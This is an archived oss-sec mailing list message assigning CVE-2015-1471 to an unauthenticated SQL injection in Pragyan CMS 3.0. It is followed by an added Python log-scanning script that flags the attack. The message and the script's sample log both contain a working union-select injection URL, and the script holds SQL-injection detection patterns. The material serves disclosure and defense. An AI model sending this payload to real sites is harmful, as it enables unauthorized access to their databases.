oss-sec mailing list archives

Re: CVE-Request -- Pragyan CMS v.3.0 -- SQL injection vulnerability


From: cve-assign () mitre org
Date: Tue, 3 Feb 2015 17:54:17 -0500 (EST)

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Attackers can exploit that vulnerability by appending arbitrary SQL queries
to a registered user's profile id without being authenticated.

/user:1%27+and+1=2+union+select+database%28%29,version%28%29,3+--+

http://sroesemann.blogspot.de/2015/01/sroeadv-2015-11.html
https://github.com/delta/pragyan/issues/206
http://pastebin.com/ip2gGYuS
http://sroesemann.blogspot.de/2015/02/advisory-for-sroeadv-2015-11.html
http://seclists.org/fulldisclosure/2015/Feb/18

Use CVE-2015-1471.

- -- 
CVE assignment team, MITRE CVE Numbering Authority
M/S M300
202 Burlington Road, Bedford, MA 01730 USA
[ PGP key available through http://cve.mitre.org/cve/request_id.html ]
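An added example, not part of the original message or of the Pragyan code base: a log check for the `/user:` request shape quoted above, which flags any profile id that is not a plain identifier once URL-decoded. The combined access log format, the id allowlist and the sample lines are assumptions made for illustration.

```python
import re
from urllib.parse import unquote_plus

# Assumption: a legitimate profile id is a short run of letters, digits, "_", "." or "-".
VALID_ID = re.compile(r"[A-Za-z0-9_.-]{1,64}")
# Request line of a combined-format access log entry (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[0-9.]+"')
# The /user:<id> path segment from the report; the id runs to the next "/" or "?".
USER_SEGMENT = re.compile(r"/user:([^/?]*)")
# Triage hints only: the allowlist decides whether a request is flagged.
SQL_HINTS = {
    "quote": re.compile(r"['\"]"),
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I | re.S),
    "comment": re.compile(r"--|#|/\*"),
    "boolean": re.compile(r"\b(?:and|or)\b\s+\S+\s*=", re.I),
}

def inspect_line(line):
    """Return (raw_id, decoded_id, hints) for a flagged /user: request, else None."""
    req = REQUEST.search(line)
    seg = USER_SEGMENT.search(req.group(1)) if req else None
    if not seg:
        return None
    # Decode "%27" and "+" so the check sees the id the way the application would.
    decoded = unquote_plus(seg.group(1))
    if VALID_ID.fullmatch(decoded):
        return None
    hints = sorted(name for name, rx in SQL_HINTS.items() if rx.search(decoded))
    return seg.group(1), decoded, hints

# Constructed sample log lines (documentation addresses); entry 2 carries the request from the report.
SAMPLE_LOG = [
    '192.0.2.10 - - [03/Feb/2015:10:00:01 +0000] "GET /user:1 HTTP/1.1" 200 5120',
    '192.0.2.44 - - [03/Feb/2015:10:00:07 +0000] "GET /user:1%27+and+1=2+union+select'
    '+database%28%29,version%28%29,3+--+ HTTP/1.1" 200 5200',
    '192.0.2.10 - - [03/Feb/2015:10:00:09 +0000] "GET /news/ HTTP/1.1" 200 900',
    '192.0.2.10 - - [03/Feb/2015:10:00:12 +0000] "GET /user:42?tab=info HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    for number, line in enumerate(SAMPLE_LOG, 1):
        finding = inspect_line(line)
        if finding:
            print(f"line {number}: id={finding[1]!r} hints={finding[2]}")
```

Because the request needs no authentication, a check like this has to cover all traffic to the route rather than only logged-in sessions.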

